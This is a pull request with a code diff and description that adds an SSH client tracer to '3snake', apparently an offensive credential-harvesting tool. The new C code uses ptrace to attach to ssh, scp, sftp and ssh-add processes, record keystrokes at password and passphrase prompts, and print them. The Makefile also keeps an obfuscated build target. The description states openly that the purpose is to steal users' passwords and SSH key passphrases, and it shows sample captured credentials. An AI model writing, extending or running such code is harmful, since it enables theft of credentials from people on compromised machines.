### PR TITLE
Add SSH client tracer

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -14,20 +14,20 @@ ASAN = 3snake-asan
 FUZZ = 3snake-fuzz
 OBFU = 3snake-obfu
 
-OBJS = src/procinfo.o src/sudo_tracer.o src/su_tracer.o src/ssh_tracer.o src/tracers.o src/main.o src/plisten.o
+OBJS = src/procinfo.o src/sudo_tracer.o src/su_tracer.o src/ssh_tracer.o src/ssh_client_tracer.o src/tracers.o src/main.o src/plisten.o
 
 all: $(PROG)
 $(PROG): $(OBJS)
 	$(CC) $(OBJS) -o $(PROG)
 
 asan:
-	clang -fsanitize=address -Isrc src/tracers.c src/procinfo.c src/main.c src/su_tracer.c src/ssh_tracer.c src/sudo_tracer.c src/plisten.c -o $(ASAN)
+	clang -fsanitize=address -Isrc src/tracers.c src/procinfo.c src/main.c src/su_tracer.c src/ssh_tracer.c src/sudo_tracer.c src/ssh_client_tracer.c src/plisten.c -o $(ASAN)
 
 fuzz:
-	clang++ -g -fsanitize=address -fsanitize-coverage=trace-pc-guard src/fuzz/tracers_fuzzer.cc -Isrc src/procinfo.c src/tracers.c src/ssh_tracer.c src/sudo_tracer.c src/su_tracer.c ${LIBFUZZER_PATH} -o $(FUZZ)
+	clang++ -g -fsanitize=address -fsanitize-coverage=trace-pc-guard src/fuzz/tracers_fuzzer.cc -Isrc src/procinfo.c src/tracers.c src/ssh_tracer.c src/sudo_tracer.c src/su_tracer.c src/ssh_client_tracer.c ${LIBFUZZER_PATH} -o $(FUZZ)
 
 obfuscate:
-	${LLVM_OBFUSCATE_CLANG} -Isrc src/procinfo.c src/main.c src/plisten.c src/tracers.c src/sudo_tracer.c src/su_tracer.c src/ssh_tracer.c -o $(OBFU) -mllvm -sub -mllvm -fla -mllvm -bcf
+	${LLVM_OBFUSCATE_CLANG} -Isrc src/procinfo.c src/main.c src/plisten.c src/tracers.c src/sudo_tracer.c src/su_tracer.c src/ssh_tracer.c src/ssh_client_tracer.c -o $(OBFU) -mllvm -sub -mllvm -fla -mllvm -bcf
 
 clean:
 	rm -f $(PROG) $(ASAN) $(FUZZ) $(OBFU) $(OBJS) crash-* leak-* fuzz-* oom-*

--- a/src/config.h
+++ b/src/config.h
@@ -2,9 +2,10 @@
 #define SNAKE_CONFIG
 
 // User defined configuration variables
-#define ENABLE_SSH  1
-#define ENABLE_SUDO 1
-#define ENABLE_SU   0
+#define ENABLE_SSH        1
+#define ENABLE_SUDO       1
+#define ENABLE_SU         0
+#define ENABLE_SSH_CLIENT 0
 
 // Dump strings that are less than 5 characters from openssh server
 #define SHORT_SSH_STRINGS 0

--- a/src/plisten.c
+++ b/src/plisten.c
@@ -100,7 +100,7 @@ int handle_proc_ev(int nl_sock) {
     switch (nlcn_msg.proc_ev.what) {
       case PROC_EVENT_EXEC:
         //Do this check here so we don't spawn a process for nothing
-        if (!ENABLE_SUDO && !ENABLE_SU)
+        if (!ENABLE_SUDO && !ENABLE_SU && !ENABLE_SSH_CLIENT)
           break;
 
         child = fork();

--- a/src/ssh_client_tracer.c
+++ b/src/ssh_client_tracer.c
@@ -1,0 +1,110 @@
+#include <sys/ptrace.h>
+#include <bits/types.h>
+#include <sys/reg.h>
+#include <sys/user.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#include "config.h"
+#include "helpers.h"
+#include "tracers.h"
+
+#define PASS_PROMPT               ": "
+#define PASSPHRASE_PROMPT_KEYWORD "passphrase"
+
+extern pid_t process_pid;
+extern char *process_name;
+extern char *process_path;
+extern char *process_username;
+
+void intercept_ssh_client(pid_t traced_process) {
+  int status = 0;
+  int syscall = 0;
+  int i = 0;
+  long length = 0;
+  char *read_string = NULL;
+  char *write_string = NULL;
+  int pass_prompt = 0;
+  char *prompt_str = NULL;
+  char *password = NULL;
+  struct user_regs_struct regs;
+
+  password = (char *) calloc(sizeof(char) * MAX_PASSWORD_LEN + 1, 1);
+  
+  if (!password)
+    goto exit_ssh_client;
+
+  memset(&regs, 0, sizeof(regs));
+  ptrace(PTRACE_ATTACH, traced_process, NULL, &regs);
+  waitpid(traced_process, &status, 0);
+  
+  if (!WIFSTOPPED(status))
+    goto exit_ssh_client;
+  
+  ptrace(PTRACE_SETOPTIONS, traced_process, 0, PTRACE_O_TRACESYSGOOD);
+  
+  while(1) {
+    if (wait_for_syscall(traced_process) != 0)
+      break;
+
+    syscall = get_syscall(traced_process);
+
+    if (syscall == SYSCALL_read && pass_prompt) {
+      length = get_syscall_arg(traced_process, 2);
+
+      if (length == 1) {
+        // Concatenate password/passphrase one char at a time
+        read_string = extract_read_string(traced_process, length);
+        if (read_string[0] && i < MAX_PASSWORD_LEN) {
+          password[i++] = read_string[0];
+        }
+        free(read_string);
+        read_string = NULL;
+      }
+    } else if (syscall == SYSCALL_write) {
+      length = get_syscall_arg(traced_process, 2);
+      write_string = extract_write_string(traced_process, length);
+
+      if (length == 1) {
+        // User has entered password/passphrase and pressed 'enter'
+        if (write_string[0] == '\n' && pass_prompt) {
+            output("%s\n", password);
+            pass_prompt = 0;
+            memset(password, 0, MAX_PASSWORD_LEN);
+            i = 0;
+        }
+      } else {
+        // Check if password or passphrase prompt is encountered
+        prompt_str = strstr(write_string, PASS_PROMPT);
+        if (prompt_str && strlen(prompt_str) == strlen(PASS_PROMPT)) {
+          pass_prompt = 1;
+        }
+        // Output passphrase prompt containing SSH key path
+        if (strstr(write_string, PASSPHRASE_PROMPT_KEYWORD)) {
+          output("%s\n", write_string);
+        }
+      }
+
+      free(write_string);
+      write_string = NULL;
+    } else if (syscall == SYSCALL_dup) {
+      // Stop tracing after successful authentication for ssh
+      goto exit_ssh_client;
+    }
+    
+    if (wait_for_syscall(traced_process) != 0)
+      break;
+  }
+
+exit_ssh_client:
+  free(password);
+  free_process_name();
+  free_process_username();
+  free_process_path();
+  ptrace(PTRACE_DETACH, traced_process, NULL, NULL);
+  exit(0);
+}

--- a/src/ssh_client_tracer.h
+++ b/src/ssh_client_tracer.h
@@ -1,0 +1,6 @@
+#ifndef SNAKE_SSH_CLIENT_TRACER
+#define SNAKE_SSH_CLIENT_TRACER
+
+void intercept_ssh_client(pid_t traced_process);
+
+#endif

--- a/src/tracers.c
+++ b/src/tracers.c
@@ -18,7 +18,7 @@
 #include "procinfo.h"
 #include "tracers.h"
 
-void (*tracers[])(pid_t) = {NULL, intercept_ssh, intercept_sudo, intercept_su, NULL};
+void (*tracers[])(pid_t) = {NULL, intercept_ssh, intercept_sudo, intercept_su, intercept_ssh_client, NULL};
 
 pid_t process_pid;
 char *process_name;
@@ -140,6 +140,7 @@ void free_process_username(void) {
 
 enum tracer_types validate_process_name(void) {
 
+
   if (!process_name)
     return invalid_tracer;
 
@@ -154,6 +155,11 @@ enum tracer_types validate_process_name(void) {
 
   if (ENABLE_SU && strncmp(process_name, P_SU, strlen(P_SU)) == 0)
     return su_tracer;
+
+  if (ENABLE_SSH_CLIENT && (strncmp(process_name, P_SSH_CLIENT, strlen(P_SSH_CLIENT)) == 0 || 
+                            strncmp(process_name, P_SSH_SCP_SFTP, strlen(P_SSH_SCP_SFTP)) == 0 ||
+                            strncmp(process_name, P_SSH_ADD, strlen(P_SSH_ADD)) == 0))
+    return ssh_client_tracer;
 
   return invalid_tracer;
 }

--- a/src/tracers.h
+++ b/src/tracers.h
@@ -18,16 +18,21 @@
 #define P_SSH_ACC "sshd: [accepted]"
 #define P_SUDO "sudo "
 #define P_SU "su "
+#define P_SSH_CLIENT "ssh "
+#define P_SSH_SCP_SFTP "/usr/bin/ssh "
+#define P_SSH_ADD "ssh-add "
 
 #ifdef __amd64__
 #define eax rax
 #define orig_eax orig_rax
 #define SYSCALL_read  0
 #define SYSCALL_write 1
+#define SYSCALL_dup   32
 #define SYSCALL_clone 56
 #else
 #define SYSCALL_read  3
 #define SYSCALL_write 4
+#define SYSCALL_dup   41
 #define SYSCALL_clone 120
 #endif
 
@@ -38,7 +43,8 @@ enum tracer_types {
   invalid_tracer,
   ssh_tracer,
   sudo_tracer,
-  su_tracer
+  su_tracer,
+  ssh_client_tracer
 };
 
 void trace_process(pid_t);
@@ -61,5 +67,6 @@ void free_process_username(void);
 void intercept_ssh(pid_t);
 void intercept_sudo(pid_t);
 void intercept_su(pid_t);
+void intercept_ssh_client(pid_t);
 
 #endif


### PR DESCRIPTION
Added new ssh client tracer to steal user's password or SSH key passphrase used in SSH client on the box. Below are some sample outputs:

`ssh` client using password-based authentication:
```
# ./3snake
[root] 1546846846 19106 ssh tester@server   password2
[root] 1546846852 19106 ssh tester@server   password3
```

`ssh` client using passphrase protected key for key-based authentication:
```
# ./3snake
[root] 1546846955 19228 ssh -i /root/.ssh/id_rsa.server tester@server   Enter passphrase for key '/root/.ssh/id_rsa.server':
[root] 1546846960 19228 ssh -i /root/.ssh/id_rsa.server tester@server   P@ssphraseForid_rsa.server
```

`ssh-add` to add passphrase protected key to ssh-agent:
```
# ./3snake
[root] 1546847012 19334 ssh-add /root/.ssh/id_rsa.server    Enter passphrase for /root/.ssh/id_rsa.server:
[root] 1546847074 19334 ssh-add /root/.ssh/id_rsa.server    P@ssphraseForid_rsa.server
```

`scp` using password-based authentication:
```
# ./3snake
[root] 1546847165 19350 /usr/bin/ssh -x -oForwardAgent=no -oPermitLocalCommand=no -oClearAllForwardings=yes -oRemoteCommand=none -oRequestTTY=no -l tester -- server scp -f /etc/passwd     password3
```

`sftp` using password-based authentication:
```
# ./3snake
[root] 1546847186 19397 /usr/bin/ssh -oForwardX11 no -oForwardAgent no -oPermitLocalCommand no -oClearAllForwardings yes -oProtocol 2 -s -- tester@server sftp  password3
```